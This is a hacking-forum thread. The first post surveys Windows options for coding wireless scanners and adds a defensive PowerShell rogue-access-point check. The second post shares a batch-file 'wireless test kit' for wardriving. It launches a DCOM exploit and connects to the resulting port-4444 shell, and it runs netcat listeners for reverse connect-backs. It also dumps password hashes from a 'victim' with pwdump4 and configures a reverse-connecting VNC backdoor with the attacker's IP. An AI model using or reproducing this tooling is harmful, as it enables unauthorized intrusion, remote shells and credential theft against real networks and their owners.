IDEspinner
Seeing the lack of posts in this forum makes me sad... so I will help fill it up.

Coding Wireless applications in windows.

Alright, when you are trying to code your very own netstumbler there are a few choices out there for you to use. Making a netstumbler clone is honestly pretty simple.

1: Use WRAPI.
QUOTE
WRAPI is a software library that allows applications running in user space on mobile end stations to query information about the IEEE 802.11 network they are attached to. WRAPI 1.0 is implemented on the Windows XP operating system and is a hardware-independent tool that works with any IEEE 802.11b wireless network hardware vendor.


you can get wrapi here
hxxp://ramp.ucsd.edu/pawn/wrapi/

If you use WRAPI, you have the advantage that it is guaranteed to work regardless of the wireless card. The downside: you must use XP. WRAPI is a fairly straightforward library to use with a nice set of functions. You can easily make a netstumbler clone with this in any language of your choice (after you compile WRAPI).

A major drawback to using WRAPI is that you must have the Windows DDK. Not everybody has it, but it is free (minus shipping and handling?).
Get it here:
hxxp://www.microsoft.com/whdc/devtools/ddk/orderddkcd.mspx

2: Use the WMI
When the Shmoo Group gave their presentation at toorcon, I was definitely intrigued because even though I knew all of it already, I never thought to use it. WMI has many functions that support a lot of wireless applications. Your netstumbler clone in VBScript couldn't be easier. To see a quick example of the functions that are provided you can just go to
start -> run -> "wbemtest" -> click connect -> under namespace put "root\wmi"
click "enum classes" -> click recursive -> click ok

Now here you see all the functions you are entitled to. Specifically, scroll down to the
"MSNdis_80211_" fields and look at all those wireless functions... hmm, I wonder what we could do with those. Use your imagination.

If you want source, I found this example: "Wireless Signal Strength"
hxxp://www.samurize.com/modules/ipboard/http://www.governmentsecurity.org/forum/index.php?showtopic=2505&st=0

3. Use winpcap
Just because it's not specifically for wireless and you can't grab management frames doesn't make it useless.

Airsnare is a good example of this:
hxxp://home.comcast.net/~jay.deboer/airsnare/

QUOTE
AirSnare is another tool to add to your Wireless Intrusion Detection Toolbox.  AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place.  If AirSnare detects an unfriendly MAC address you have the option of tracking the MAC address's access to IP addresses and ports or by launching Ethereal upon a detection.


Using winpcap, found at
hxxp://winpcap.polito.it/
you can still code many useful utilities.

4. Driver/ndis programming
Yep, last resort, but is it really that difficult?
Probably, but if you recall a recent post of mine regarding hostap for windows, you may recall a neat app called Prisma. If you happen to own a Prism 2 based card you can easily build off the source, since it's included. In fact, if you have anything to add, I'm sure they could use your help.

QUOTE
26/06/2004

Help needed for WEP cracking on windows !
I wrote a quick and dirty sample program to control Prism2 based cards using the Winpcap protocol driver and the PacketRequest API. WEP cracking requires the capture of 802.11 frames; this program shows how to set those cards into HostAP and monitor mode and contains functions to get/set parameters of  the Prism2 chipset. The FULL SOURCE CODE for Visual C++ is included, I hope that you can help me on some topics and problems I found. The code should compile without problems but to test the program you need a Prism2 based card and the Winpcap driver installed.
You can download Prisma here.


You can download Prisma here:
hxxp://www.oxid.it/downloads/Prisma_v1.0.zip


So wrapping it up, are you really limited on windows?

Yes.

OK, but at least you have many options still available to you. Go out and code me a great app using a combination of all these methods; it's 100 percent possible!
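As an added example (not code from the post, the Shmoo Group or any project named above), here is the WMI route in PowerShell: it reads each adapter's last BSS scan from the MSNdis_80211_ classes in root\wmi and flags any BSSID that is not on a known-AP allowlist, which is the basic rogue-AP check a site survey tool is built around. Assumed: the class MSNdis_80211_BSSIList and the property names used below are those exposed by the XP-era NDIS 802.11 WMI provider, and $KnownBssids is a constructed sample allowlist.

```powershell
# Added example, not from the original post. Assumes the legacy XP-era
# MSNdis_80211_* WMI classes (root\wmi) and the property names used below.
# $KnownBssids is a constructed sample allowlist; replace it with your AP inventory.
$KnownBssids = @('00-11-22-33-44-55', '00-11-22-33-44-56')

function Get-ObservedBss {
    # One MSNdis_80211_BSSIList instance per wireless adapter; each carries
    # the adapter's most recent BSS scan results (assumed property names).
    Get-WmiObject -Namespace 'root\wmi' -Class 'MSNdis_80211_BSSIList' |
        ForEach-Object {
            $adapter = $_.InstanceName
            foreach ($bss in $_.Ndis80211BSSIList) {
                # MAC is a 6-byte array; SSID is a length plus a 32-byte buffer.
                $mac  = ($bss.Ndis80211MacAddress | ForEach-Object { $_.ToString('X2') }) -join '-'
                $len  = [int]$bss.Ndis80211Ssid.Ndis80211SsIdLength
                $ssid = if ($len -gt 0) {
                    -join ([char[]]$bss.Ndis80211Ssid.Ndis80211SsId[0..($len - 1)])
                } else { '<hidden>' }
                [pscustomobject]@{
                    Adapter = $adapter
                    Bssid   = $mac
                    Ssid    = $ssid
                    Rssi    = [int]$bss.Ndis80211Rssi      # signal strength in dBm
                    Privacy = [bool]$bss.Ndis80211Privacy   # encryption bit set by the AP
                }
            }
        }
}

function Find-UnknownBss {
    # Anything not on the allowlist is worth a look: rogue AP, evil twin, or
    # simply an AP that was never added to the inventory.
    param([string[]]$Allowlist)
    Get-ObservedBss | Where-Object { $Allowlist -notcontains $_.Bssid }
}

Get-ObservedBss | Format-Table -AutoSize
Find-UnknownBss -Allowlist $KnownBssids |
    ForEach-Object { Write-Warning "Unlisted BSSID $($_.Bssid) ('$($_.Ssid)') seen on $($_.Adapter)" }
```

The provider only reports what the adapter found on its last scan, so run it after the card has had a moment to scan, and expect it to be absent on drivers newer than the legacy NDIS 5 model.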
midnightsavage
Well, this is my first post so I hope someone gets something out of it. I don't know a lot about hacking and only basic programming, so no flames please. You have to configure your program locations in the other batch files and you have to configure your wireless network name for the change IP part. I wrote these bat files to give me a central interface when I was wardriving. Comments or improvements are appreciated.

In order to use them you must have these programs.

aircrack.exe
airodump.exe
cain.exe
netstumbler.exe
nmap.exe
pwdump4.exe google
tftpd32.exe google
kaht2.exe google
nc.exe google
winfo.exe google
DcomExploit.exe google
installer.exe and client.exe from institution 2004 vnc package VNC



All the batch files must be named the same unless you want to change the code.


This is wireless.bat
CODE

color 0a
rem I hardly consider myself a hacker of any sort. I put this together because i wanted

rem a central interface when I was wardriving. Windows batch programming is hardly

rem programming and I wish I could have wrote this in REAL code. I would advise
rem against trying to break into a company of any size.They have the technology to
rem catch you. HAVE FUN!

:start
title Welcome to the MATRIx:
@echo off
echo
echo
cls
echo                  +----------------------------------------------------+
echo                  =           WIRLE$$ TE$T KIT                         =
echo                  =        STRESSFRACTURE                              =  
echo                  =           stress_fracture@excite.com               =
echo                  +----------------------------------------------------+                                

                 
echo /) Local IP Configuration                ') Dcom Exploit Connect
echo.                                                                          
echo .) Net View                             ;) VNC Server Edit                                                

                             
echo ,) NMAP Scan                             L) Start TFTP Server
echo.                                            
echo M) Trace Route                           K) VNC Client
echo.  
echo N) Netcat Listener                       J) Air Dump
echo.  
echo B) Hack Server                           H) Air Crack
echo.  
echo V) ARP cache                             G) Cain
echo.  
echo C) KAHT2                                 F) IP Renew
echo.  
echo X) Dcom Exploit                          D) Command Prompt
echo.  
echo.Q) Open Directory                        S) PWDUMP4
echo.
echo.A) Netstumbler                           \) Winfo
echo.
echo.]) Change IP                             Z) Exit
echo.  


:choice
set /p c=                                $:
if "%C%"=="/" goto localip
if "%C%"=="." goto shares
if "%C%"=="," goto nmap
if "%C%"=="m" goto traceroute
if "%C%"=="n" goto netcat
if "%C%"=="b" goto server
if "%C%"=="v" goto arp
if "%C%"=="c" goto kaht2
if "%C%"=="x" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="l" goto tftp
if "%C%"=="k" goto vncclient
if "%C%"=="j" goto airdump
if "%C%"=="h" goto aircrack
if "%C%"=="g" goto cain
if "%C%"=="f" goto iprenew
if "%C%"=="q" goto opendir
if "%C%"=="d" goto command
if "%C%"=="s" goto pwdump
if "%C%"=="a" goto netstumbler
if "%C%"=="\" goto winfo
if "%C%"=="]" goto ipchange
if "%C%"=="z" goto :eof

if "%C%"=="/" goto localip
if "%C%"=="." goto shares
if "%C%"=="," goto nmap
if "%C%"=="M" goto traceroute
if "%C%"=="N" goto netcat
if "%C%"=="B" goto server
if "%C%"=="V" goto arp
if "%C%"=="C" goto kaht2
if "%C%"=="X" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="L" goto tftp
if "%C%"=="K" goto vncclient
if "%C%"=="J" goto airdump
if "%C%"=="H" goto aircrack
if "%C%"=="G" goto cain
if "%C%"=="F" goto iprenew
if "%C%"=="D" goto command
if "%C%"=="Q" goto opendir
if "%C%"=="S" goto pwdump
if "%C%"=="A" goto netstumbler
if "%C%"=="|" goto winfo
if "%C%"=="}" goto ipchange
if "%C%"=="Z" goto :eof


:localip
cls
@echo off
ipconfig
pause
goto :start
:shares
cls

@echo off
rem this doent usually work
net view
echo Enter Target:
set /p netviewtarget=
net view  %netviewtarget%
pause
goto :start
:nmap
rem nmap has to be in the same directory as wireless.bat or you can change directory with cd
cls
rem nmap settings can be changed, these are just what I like to use.
@echo off
set /p scantarget=Enter Target:
@echo Enter Scan Type:
@echo S -sS
@echo T -sT
@echo V -sV
@echo Must be Capitol
set /p scantype=

nmap -s%scantype% -P0 -T Insane -vv  %scantarget%
pause

goto :start

:traceroute

@echo off
set /p tracetarget=Enter Target:
tracert %tracetarget%
pause
goto :start

:netcat
rem netcat must be in the same directory
@echo Enter port:
set /p port=
start "Netcat listening on port %port%" /MIN nc -v -t -l -p %port% -L
echo Netcat server started on port %port%
pause
goto :start

:server
rem ports  used for reverse connect backs. Put whatever you want here.
start /MIN nc -t -v -l -p  80 -L
start /MIN nc -t -v -l -p  666 -L
start /MIN nc -t -v -l -p  8080 -L
start /MIN nc -t -v -l -p  9999 -L
start /MIN nc -t -v -l -p 22178 -L
start /MIN nc -t -v -l -p 31337 -L
echo Netcat listening on ports 80, 666, 8080, 9999, 22178, 31337...
pause
goto :start
:arp
arp -a
pause
goto :start

:kaht2
set /p  ip1=First IP Address:
set /p ip2=Second IP Address:
start kaht2 %ip1% %ip2%
goto :start

:dcomexploit
echo 0 win32 2000 SP0
echo 1 win32 2000 SP1
echo 2 win32 2000 SP2
echo 3 win32 2000 SP3
echo 4 win32 2000 SP4
echo 5 win32 XP SP0
echo 6 win32 XP SP1
echo Shell on port 4444 if exploit succesful
set /p  targetid=Enter Version:
set /p  address=Enter IP:
echo Shell on port 4444 if exploit succesful
start dcomexploit %targetid% %address%

goto :start

:dcomconnect
rem this is for a computer exploited with dcomexploit above.
set /p target=Enter Target:
start  nc %target% 4444
goto :start

:vncedit
start vncedit.bat
goto :start

:tftp
rem I always keep tftp32 in my program directory but you can change it to wherever its at
rem in case your wondering tftp is for transfering files ex   "tftp -i server get filename" or  "tftp -i server put filename"   usually takes a couple of tries on
rem victim if you get unexpected block errors

start /min tftpd32.exe
goto  :start

:vncclient
start /min client.exe
goto :start

:airdump
start airodump.bat
goto :start

:aircrack
rem edit aircrack location in aircrack.bat
start aircrack.bat
goto :start

:cain
rem Cain can be found at  http:\\www.oxid.it
rem Edit the location where cain is located in cain.bat
start cain.bat
goto :start

:iprenew
rem this renews your IP address on a DHCP enabled AP
start /min ipconfig /renew
goto :start

:opendir
start opendir.bat
goto :start

:command
start
goto :start

:pwdump
cls
echo off
set   target=0
set   share=0
set   output=0
set   username=0
set   rename=0
set /p  target=Enter Target IP:
set /p  share=Enter Share:
set /p output=Enter Output File Name:
set /p username=Enter Username:
set /p rename=Rename Files on Victim to:
pwdump4 %target% /s:%share% /o:%output% /u:%username% /r:%newname%
pause
goto :start

:netstumbler
start netstumbler.bat
goto :start

:winfo
cls
set /p target=Enter Target:
set /p textfile=Enter text file Prefix:
set /p var=Use Null Session(y/n)
if "%var%"=="y"  winfo %target% -n -v >> %textfile%.txt
if "%var%"=="n"  winfo %target%  -v  >> %textfile%.txt
start  %textfile%.txt
goto :start

:ipchange
start ipchange.bat
goto :start



This is airodump.bat
CODE

echo  off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start  airodump
exit

This is cain.bat
CODE

echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd program files\y.bin\cain
start  cain.exe
exit
This is ipchange.bat
CODE

echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
rem You have to edit Orinoco for the name of your connection

set /p x=DHCP 1     STATIC 2      :
if "%x%"=="1" goto dhcp
if "%x%"=="2" goto static



:static
echo off
set /p ip=Enter new IP:
echo.
set /p sm=Enter Subnet Mask:
echo.
set /p gw=Enter Default Gateway:
netsh interface ip set dns  "Orinoco" static %gw%
netsh interface ip set address "Orinoco" static %ip% %sm% %gw% 1


:dhcp
netsh interface ip set dns name="Orinoco" source=dhcp
netsh interface ip set  address name="Orinoco" source=dhcp

pause


exit
This is netstumbler.bat
CODE


echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd program files\network stumbler
start  netstumbler.exe
exit

This is explorer.bat
CODE

echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
start explorer c:\documents and settings\travis\desktop\hacktools\hacktoolsx
exit
This is installer.bat
CODE

echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\tftp
rem This edits the Institution VNC reverse connect back vnc server
echo.
echo.
@echo Reverse VNC connect Listener Editor
echo.
echo.
set /p ip=Enter your IP:
set /p port=Enter Port Client Listening on:
installer.exe -e "dll32"  %ip% %port%
exit
This is aircrack.bat
CODE



echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start aircrack
exit


I would post everything you need here but alas I am limited by the restrictions on this forum.